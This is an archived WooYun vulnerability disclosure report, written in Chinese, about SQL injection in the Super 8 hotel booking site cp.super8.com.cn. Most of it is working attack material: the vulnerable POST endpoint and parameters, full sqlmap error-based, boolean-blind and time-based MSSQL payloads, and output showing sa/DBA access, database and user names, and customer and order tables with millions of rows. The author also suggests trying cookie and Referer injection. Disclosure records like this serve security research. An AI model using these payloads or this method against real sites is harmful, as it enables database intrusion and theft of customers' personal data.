乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-23: 细节已通知厂商并且等待厂商处理中 2015-09-28: 厂商已经主动忽略漏洞,细节向公众公开
快一个月了,抓包测试了下,发现存在注入,没有提交,现在重新测试来提交吧。过了这么久,不会跟人家的重复了吧!~~~
http://cp.super8.com.cn/Hotel/List或者http://cp.super8.com.cn/抓包
http://cp.super8.com.cn/Hotel/HotelList (POST)stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
citycode、honour、servercs存在注入(还可以测试下cookie中的参数或者referer的注入试试!~~~)
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: honour Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=&honour=-4628) OR 7763=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (7763=7763) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND (4155=4155&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=&honour=-4048) OR 3047=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (8777=8777&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9Place: POSTParameter: citycode Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 2424=2424 AND ('aDZF'='aDZF&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 3376=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (3376=3376) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND ('QfCW'='QfCW&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 7647=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('iwOc'='iwOc&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9Place: POSTParameter: servercs Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=-6013) OR 1049=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (1049=1049) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND (3379=3379&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=-1418) OR 3789=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers ASsys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (5903=5903&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9---[01:57:05] [WARNING] changes made by tampering scripts are not included in shown payload content(s)there were multiple injection points, please select the one to use for following injections:[0] place: POST, parameter: citycode, type: Single quoted string (default)[1] place: POST, parameter: honour, type: Unescaped numeric[2] place: POST, parameter: servercs, type: Unescaped numeric[q] Quit> 0[02:00:23] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2012[02:00:23] [INFO] fetching current user[02:00:23] [INFO] resumed: sacurrent user: 'sa'[02:00:23] [INFO] fetching current database[02:00:23] [INFO] resumed: crs2current database: 'crs2'[02:00:23] [INFO] testing if current user is DBAcurrent user is DBA: Truedatabase management system users [17]:[*] ##MS_AgentSigningCertificate##[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicySigningCertificate##[*] ##MS_PolicyTsqlExecutionLogin##[*] ##MS_SmoExtendedSigningCertificate##[*] ##MS_SQLAuthenticatorCertificate##[*] ##MS_SQLReplicationSigningCertificate##[*] ##MS_SQLResourceSigningCertificate##[*] crstemp[*] NT AUTHORITY\\SYSTEM[*] NT Service\\MSSQLSERVER[*] NT SERVICE\\SQLSERVERAGENT[*] NT SERVICE\\SQLWriter[*] NT SERVICE\\Winmgmt[*] PHHXAPP12\\Administrator[*] sa[*] super8crsavailable databases [20]:[*] crs2[*] crs3[*] crs_all[*] crs_report[*] FHS_SRC[*] ipegasus3[*] ipegasus3_empty[*] ipegasus3_test[*] ipegasus_gresall[*] ipegasus_history[*] ipegasus_mirro[*] ipegasus_test125[*] master[*] model[*] model2[*] msdb[*] s8_new[*] s8_ws[*] Super8_DW[*] tempdbDatabase: crs2| dbo.Cu_CustomerInfo | 5059428 || dbo.Cu_AvailableCard | 5232807 || dbo.customertemp | 4147436 || dbo.Order_GstInfo | 1271902 || dbo.Order_OptInfo | 1175851 || dbo.Order_Info | 1163925 || dbo.Order_StatisticsInfo | 1163925 || dbo.Weixin_Mapping | 524954 || dbo.Order_Email | 196106 || dbo.customermobile | 139662 || dbo.CC_CorpCustomer | 122552 || dbo.Cu_CustomerLog | 24126 || dbo.PMS_User | 942 || dbo.UP_User | 519 |
只是测试了一部分数据作为证明,如下图!~~~
其余的数据库也能查看信息,就不继续了!~~~
如上所说
过滤修复
危害等级:无影响厂商忽略
忽略时间:2015-09-28 09:02
漏洞Rank:15 (WooYun评价)
暂无